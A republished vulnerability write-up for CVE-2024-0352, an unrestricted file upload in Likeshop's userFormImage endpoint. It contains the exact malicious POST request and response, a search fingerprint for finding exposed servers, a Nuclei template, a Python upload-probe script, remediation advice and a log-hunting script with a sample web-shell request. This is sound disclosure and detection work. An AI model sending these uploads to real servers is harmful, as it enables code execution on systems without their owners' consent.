[Vulnerability Reproduction] CVE-2024-0352

admin, 2024-01-16 08:30:35





01

Vulnerability Name



Likeshop HTTP POST Request File.php userFormImage Unrestricted File Upload


02


Affected Versions


Likeshop < 2.5.7.20210311 (the VulDB description quoted below gives the affected range as "up to 2.5.7.20210311")



03


Vulnerability Description


Likeshop up to 2.5.7.20210311 contains a security vulnerability classified as critical. It affects the function FileServer::userFormImage in the file server/application/api/controller/File.php, part of the HTTP POST request handler component. By manipulating the parameter file an attacker achieves an unrestricted file upload. The attack can be launched remotely; the exploit has been publicly disclosed and may be in use. The VulDB identifier for this vulnerability is VDB-250120.


04


FOFA Search Query

icon_hash="874152924"



05


Reproduction


Send the following request to the lab target. The only thing that matters to the server is the multipart part named file: it carries a .php filename and a PHP content type, and the body is an arbitrary marker string rather than real PHP code.

POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

The response is as follows (msg reads "file uploaded successfully"):

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Authorization, Sec-Fetch-Mode, DNT, X-Mx-ReqToken, Keep-Alive, User-Agent, If-Match, If-None-Match, If-Unmodified-Since, X-Requested-With, If-Modified-Since, Cache-Control, Content-Type, Accept-Language, Origin, Accept-Encoding,Access-Token,token
Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, post
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 1728000
Content-Type: application/json; charset=utf-8
Date: Mon, 15 Jan 2024 07:53:52 GMT
Server: nginx

{"code":1,"msg":"上传文件成功","data":{"url":"http://192.168.40.130/uploads/user/20240114115352abad74281.php","base_url":"uploads/user/20240114115352abad74281.php","name":"IE4MGP.php"},"show":0,"time":"0.140024"}

Two details in this response are the whole vulnerability: the server renamed the file to a timestamp-based name but kept the client-supplied .php extension, and it stored the file under the web-served uploads/user/ directory. The request carried no session cookie or token header, which is consistent with the PR:N in the CVSS vector below.

The stored path is returned in the url field; requesting that URL serves the uploaded file (screenshot in the original post).

Reproduction successful.



06


Nuclei PoC


The PoC file is shown below; it has been published in nuclei-templates (the trailing # digest line is the ProjectDiscovery template signature). The matcher requires all three conditions: HTTP 200, the response echoing the random filename with its .php extension intact, and code 1 with a base_url under uploads/user; the extractor pulls data.url so the stored path is reported.

id: CVE-2024-0352

info:
  name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
  author: CookieHanHoan,babybash,samuelsamuelsamuel
  severity: high
  description: |
    A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
  impact: |
    The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0352
    - https://note.zhaoj.in/share/ciwYj7QXC4sZ
    - https://vuldb.com/?ctiid.250120
    - https://vuldb.com/?id.250120
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-0352
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 1
    vendor: likeshop
    shodan-query: http.favicon.hash:874152924
  tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive

variables:
  filename: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /api/file/formimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="file";filename="{{filename}}.php"
        Content-Type: application/x-php

        {{randstr}}
        ------WebKitFormBoundarygcflwtei--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"name\":\"{{filename}}.php\"")'
          - 'contains_all(body, "\"code\":1", "\"base_url\":\"uploads\\/user")'
        condition: and

    extractors:
      - type: json
        part: body
        json:
          - ".data.url"
# digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c80534d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950

Run the PoC (Windows, from the nuclei directory, with the target list in data/Likeshop2.txt):

.\nuclei.exe -l data/Likeshop2.txt -t nuclei-templates\http\cves\2024\CVE-2024-0352.yaml
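As an added example (not code from the original post, the nuclei template, or the Likeshop project), the following Python script builds the same multipart request shown in the reproduction section and applies the equivalent of the template's three matcher conditions to the JSON reply. The random-filename helper, the send_probe function and the host values are this example's own assumptions. Run it only against a target you are authorised to test, and note that even the plain-text marker it uploads is left on the server afterwards.

```python
# Added example (not code from the original post, the nuclei template, or
# the Likeshop project): builds the multipart POST from the reproduction
# section and applies the nuclei template's matcher conditions to the reply.
import json
import secrets
import string
from urllib.error import HTTPError
from urllib.request import Request, urlopen

BOUNDARY = "----WebKitFormBoundarygcflwtei"      # same boundary as the write-up
UPLOAD_PATH = "/api/file/formimage"
USER_AGENT = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36")


def random_name(n: int = 6) -> str:
    """Stand-in for nuclei's {{rand_base(6)}}: n random alphanumerics."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def build_multipart(filename: str, content: bytes, boundary: str = BOUNDARY) -> bytes:
    """One file part, byte-for-byte in the shape the write-up sends:
    CRLF line ends, field name 'file', a .php filename, application/x-php."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file";filename="{filename}"\r\n'
        "Content-Type: application/x-php\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail


def build_raw_request(host: str, filename: str, content: bytes) -> bytes:
    """Complete HTTP/1.1 request; Content-Length is derived from the body
    rather than typed by hand (the write-up's 201 falls out of this)."""
    body = build_multipart(filename, content)
    headers = (
        f"POST {UPLOAD_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {USER_AGENT}\r\n"
        "Connection: close\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
        "Accept-Encoding: gzip\r\n"
        "\r\n"
    ).encode()
    return headers + body


def match_response(status: int, body: str, filename: str):
    """Equivalent of the template's DSL matcher, evaluated on parsed JSON:
    status 200, code == 1, data.name == our filename (extension kept),
    data.base_url under uploads/user. Returns (matched, uploaded_url)."""
    if status != 200:
        return False, None
    try:
        doc = json.loads(body)
    except ValueError:
        return False, None
    data = doc.get("data") or {}
    if (doc.get("code") == 1
            and data.get("name") == filename
            and str(data.get("base_url", "")).startswith("uploads/user")):
        return True, data.get("url")
    return False, None


def send_probe(base_url: str, timeout: float = 10.0):
    """Live check against an authorised target: uploads a random text marker
    named <random>.php and reports whether it was stored with .php kept.
    The marker is plain text, not PHP, so nothing executes on the server."""
    filename = random_name() + ".php"
    body = build_multipart(filename, random_name(24).encode())
    req = Request(
        base_url.rstrip("/") + UPLOAD_PATH,
        data=body,
        method="POST",
        headers={
            "User-Agent": USER_AGENT,
            "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        },
    )
    try:
        with urlopen(req, timeout=timeout) as resp:
            return match_response(resp.status, resp.read().decode("utf-8", "replace"), filename)
    except HTTPError as err:
        return match_response(err.code, "", filename)


if __name__ == "__main__":
    # Offline demonstration with the write-up's own values (no network needed).
    raw = build_raw_request("192.168.40.130", "IE4MGP.php", b"2ayyhRXiAsKXL8olvF5s4qqyI2O")
    print(raw.decode())
```

The matcher deliberately checks data.name against the exact filename sent, so a server that strips or rewrites the extension (the fixed behaviour) fails the match even if it returns code 1, which keeps false positives out.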




07


Remediation


Update the affected system or software to the latest version to fix the vulnerability. Until that is done, the two properties this write-up relies on can be removed independently: the endpoint kept the client-supplied .php extension, and the web server executed the stored file under /uploads/user/. Enforce a server-side extension allowlist (image types only for an image-upload endpoint), and configure the web server so that nothing under /uploads/ is ever handed to the PHP interpreter.
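Beyond patching, the exploit chain shown in the reproduction section leaves two observable steps in the web server access log: a POST to /api/file/formimage followed, usually seconds later, by a GET for a script file under /uploads/. The following is an added example (not from the original post or the Likeshop project) of a hunt over nginx combined-format log lines; the sample lines are constructed for this example, and the 60-second correlation window and the script-extension list are assumptions.

```python
# Added example (not part of the original post or the Likeshop project):
# hunt nginx access-log lines for the two steps of this exploit chain.
import re
from collections import defaultdict
from datetime import datetime

UPLOAD_ENDPOINT = "/api/file/formimage"
# Any server-side script under the upload directory is suspicious on its own
# (the extension list is an assumption; extend it for your stack).
SCRIPT_UNDER_UPLOADS = re.compile(r"^/uploads/.*\.(php\d*|phtml|phar)(\?|$)", re.I)
WINDOW_S = 60   # assumed upload->execute correlation window
# nginx "combined" format: ip ident user [ts] "METHOD path proto" status ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log, modelled on the paths seen in the write-up.
SAMPLE_LOG = """\
192.168.40.1 - - [15/Jan/2024:07:53:52 +0000] "POST /api/file/formimage HTTP/1.1" 200 214 "-" "Mozilla/5.0"
192.168.40.1 - - [15/Jan/2024:07:53:55 +0000] "GET /uploads/user/20240114115352abad74281.php HTTP/1.1" 200 27 "-" "Mozilla/5.0"
192.168.40.7 - - [15/Jan/2024:08:10:03 +0000] "POST /api/file/formimage HTTP/1.1" 200 214 "-" "okhttp/4.9"
192.168.40.7 - - [15/Jan/2024:08:10:04 +0000] "GET /uploads/user/20240115081003c1d2e3.jpg HTTP/1.1" 200 5120 "-" "okhttp/4.9"
192.168.40.9 - - [15/Jan/2024:09:00:00 +0000] "GET /uploads/user/old.php?cmd=id HTTP/1.1" 200 19 "-" "curl/8.0"
""".splitlines()


def parse_line(line: str):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def hunt(lines):
    """Findings in log order. A request for a script under /uploads/ is
    flagged as 'script_under_uploads'; if the same client POSTed to the
    upload endpoint within WINDOW_S beforehand it is upgraded to
    'upload_then_execute', the full chain from the write-up."""
    uploads = defaultdict(list)        # ip -> timestamps of POSTs to the endpoint
    findings = []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        clean_path = path.split("?", 1)[0]
        if method == "POST" and clean_path == UPLOAD_ENDPOINT:
            uploads[ip].append(ts)
            continue                    # the upload alone is normal API traffic
        if SCRIPT_UNDER_UPLOADS.match(path):
            recent = [t for t in uploads[ip] if 0 <= (ts - t).total_seconds() <= WINDOW_S]
            kind = "upload_then_execute" if recent else "script_under_uploads"
            findings.append({"ip": ip, "path": clean_path, "status": status, "kind": kind})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f['kind']:22} {f['ip']:14} {f['status']} {f['path']}")
```

The image fetch by 192.168.40.7 is ignored, since legitimate clients upload and then display images; only script extensions under the upload tree fire. Status is kept in the finding because a 200 on the script request means the server actually executed or served it, whereas a 403 or 404 indicates the mitigation above is in place.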


Originally published on the WeChat official account AI与网安: [Vulnerability Reproduction] CVE-2024-0352

Republished by CN-SEC中文网 (please keep this link when reposting; thanks to the original author): https://cn-sec.com/archives/2397812.html
